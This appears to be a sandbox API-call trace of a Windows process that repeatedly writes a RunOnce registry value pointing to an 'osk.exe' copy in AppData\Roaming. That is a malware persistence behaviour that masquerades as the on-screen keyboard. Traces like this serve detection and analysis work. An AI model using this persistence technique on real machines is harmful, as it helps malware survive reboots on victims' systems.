[0100.533] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.533] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.533] RegCloseKey (hKey=0x280) returned 0x0 [0100.533] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.533] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.533] SetTimer (hWnd=0x20280, nIDEvent=0x2360, uElapse=0xa, lpTimerFunc=0x0) returned 0x2360 [0100.533] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.547] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.547] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.548] KillTimer (hWnd=0x20280, uIDEvent=0x2360) returned 1 [0100.548] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.548] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.548] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.549] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.549] RegCloseKey (hKey=0x280) returned 0x0 [0100.549] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.549] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.549] SetTimer (hWnd=0x20280, nIDEvent=0x2361, uElapse=0xa, lpTimerFunc=0x0) returned 0x2361 [0100.549] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.564] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.564] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.564] KillTimer (hWnd=0x20280, uIDEvent=0x2361) returned 1 [0100.565] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.565] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.565] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.565] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.566] RegCloseKey (hKey=0x280) returned 0x0 [0100.566] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.566] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.566] SetTimer (hWnd=0x20280, nIDEvent=0x2362, uElapse=0xa, lpTimerFunc=0x0) returned 0x2362 [0100.566] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.581] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.581] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.582] KillTimer (hWnd=0x20280, uIDEvent=0x2362) returned 1 [0100.582] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.582] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.582] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.583] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.583] RegCloseKey (hKey=0x280) returned 0x0 [0100.583] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.583] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.583] SetTimer (hWnd=0x20280, nIDEvent=0x2363, uElapse=0xa, lpTimerFunc=0x0) returned 0x2363 [0100.583] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.602] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.602] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.602] KillTimer (hWnd=0x20280, uIDEvent=0x2363) returned 1 [0100.602] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.603] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.603] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.603] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.603] RegCloseKey (hKey=0x280) returned 0x0 [0100.603] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.604] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.604] SetTimer (hWnd=0x20280, nIDEvent=0x2364, uElapse=0xa, lpTimerFunc=0x0) returned 0x2364 [0100.604] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.631] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.631] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.632] KillTimer (hWnd=0x20280, uIDEvent=0x2364) returned 1 [0100.632] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.632] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.632] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.633] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.633] RegCloseKey (hKey=0x280) returned 0x0 [0100.633] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.633] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.633] SetTimer (hWnd=0x20280, nIDEvent=0x2365, uElapse=0xa, lpTimerFunc=0x0) returned 0x2365 [0100.633] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.641] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.641] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.642] KillTimer (hWnd=0x20280, uIDEvent=0x2365) returned 1 [0100.642] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.642] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.642] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.642] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.643] RegCloseKey (hKey=0x280) returned 0x0 [0100.643] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.643] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.643] SetTimer (hWnd=0x20280, nIDEvent=0x2366, uElapse=0xa, lpTimerFunc=0x0) returned 0x2366 [0100.643] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.665] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.665] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.665] KillTimer (hWnd=0x20280, uIDEvent=0x2366) returned 1 [0100.665] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.666] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.666] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.666] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.666] RegCloseKey (hKey=0x280) returned 0x0 [0100.666] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.666] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.666] SetTimer (hWnd=0x20280, nIDEvent=0x2367, uElapse=0xa, lpTimerFunc=0x0) returned 0x2367 [0100.666] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.672] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.672] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.673] KillTimer (hWnd=0x20280, uIDEvent=0x2367) returned 1 [0100.673] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.673] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.673] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.674] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.674] RegCloseKey (hKey=0x280) returned 0x0 [0100.674] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.674] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.674] SetTimer (hWnd=0x20280, nIDEvent=0x2368, uElapse=0xa, lpTimerFunc=0x0) returned 0x2368 [0100.674] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.688] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.688] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.688] KillTimer (hWnd=0x20280, uIDEvent=0x2368) returned 1 [0100.689] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.689] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.689] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.689] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.689] RegCloseKey (hKey=0x280) returned 0x0 [0100.690] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.690] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.690] SetTimer (hWnd=0x20280, nIDEvent=0x2369, uElapse=0xa, lpTimerFunc=0x0) returned 0x2369 [0100.690] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.704] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.704] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.704] KillTimer (hWnd=0x20280, uIDEvent=0x2369) returned 1 [0100.705] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.705] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.705] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.705] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.706] RegCloseKey (hKey=0x280) returned 0x0 [0100.706] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.706] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.706] SetTimer (hWnd=0x20280, nIDEvent=0x236a, uElapse=0xa, lpTimerFunc=0x0) returned 0x236a [0100.706] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.732] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.732] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.733] KillTimer (hWnd=0x20280, uIDEvent=0x236a) returned 1 [0100.733] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.734] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.734] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.734] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.734] RegCloseKey (hKey=0x280) returned 0x0 [0100.734] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.734] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.734] SetTimer (hWnd=0x20280, nIDEvent=0x236b, uElapse=0xa, lpTimerFunc=0x0) returned 0x236b [0100.735] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.735] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.735] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.735] KillTimer (hWnd=0x20280, uIDEvent=0x236b) returned 1 [0100.735] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.735] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.735] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.736] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.736] RegCloseKey (hKey=0x280) returned 0x0 [0100.736] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.736] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.736] SetTimer (hWnd=0x20280, nIDEvent=0x236c, uElapse=0xa, lpTimerFunc=0x0) returned 0x236c [0100.736] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.750] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.750] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.751] KillTimer (hWnd=0x20280, uIDEvent=0x236c) returned 1 [0100.751] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.751] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.752] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.752] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.752] RegCloseKey (hKey=0x280) returned 0x0 [0100.752] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.752] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.752] SetTimer (hWnd=0x20280, nIDEvent=0x236d, uElapse=0xa, lpTimerFunc=0x0) returned 0x236d [0100.752] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.766] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.766] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.766] KillTimer (hWnd=0x20280, uIDEvent=0x236d) returned 1 [0100.766] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.767] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.767] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.767] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.768] RegCloseKey (hKey=0x280) returned 0x0 [0100.768] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.768] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.768] SetTimer (hWnd=0x20280, nIDEvent=0x236e, uElapse=0xa, lpTimerFunc=0x0) returned 0x236e [0100.768] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.791] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.791] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.792] KillTimer (hWnd=0x20280, uIDEvent=0x236e) returned 1 [0100.792] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.792] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.793] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.793] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.793] RegCloseKey (hKey=0x280) returned 0x0 [0100.793] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.793] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.793] SetTimer (hWnd=0x20280, nIDEvent=0x236f, uElapse=0xa, lpTimerFunc=0x0) returned 0x236f [0100.793] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.797] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.797] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.797] KillTimer (hWnd=0x20280, uIDEvent=0x236f) returned 1 [0100.798] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.798] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.798] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.798] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.798] RegCloseKey (hKey=0x280) returned 0x0 [0100.798] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.798] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.799] SetTimer (hWnd=0x20280, nIDEvent=0x2370, uElapse=0xa, lpTimerFunc=0x0) returned 0x2370 [0100.799] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.813] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.813] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.813] KillTimer (hWnd=0x20280, uIDEvent=0x2370) returned 1 [0100.814] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.814] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.814] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.814] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.815] RegCloseKey (hKey=0x280) returned 0x0 [0100.815] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.815] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.815] SetTimer (hWnd=0x20280, nIDEvent=0x2371, uElapse=0xa, lpTimerFunc=0x0) returned 0x2371 [0100.815] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.828] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.828] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.829] KillTimer (hWnd=0x20280, uIDEvent=0x2371) returned 1 [0100.829] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.830] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.830] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.830] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.830] RegCloseKey (hKey=0x280) returned 0x0 [0100.830] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.830] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.831] 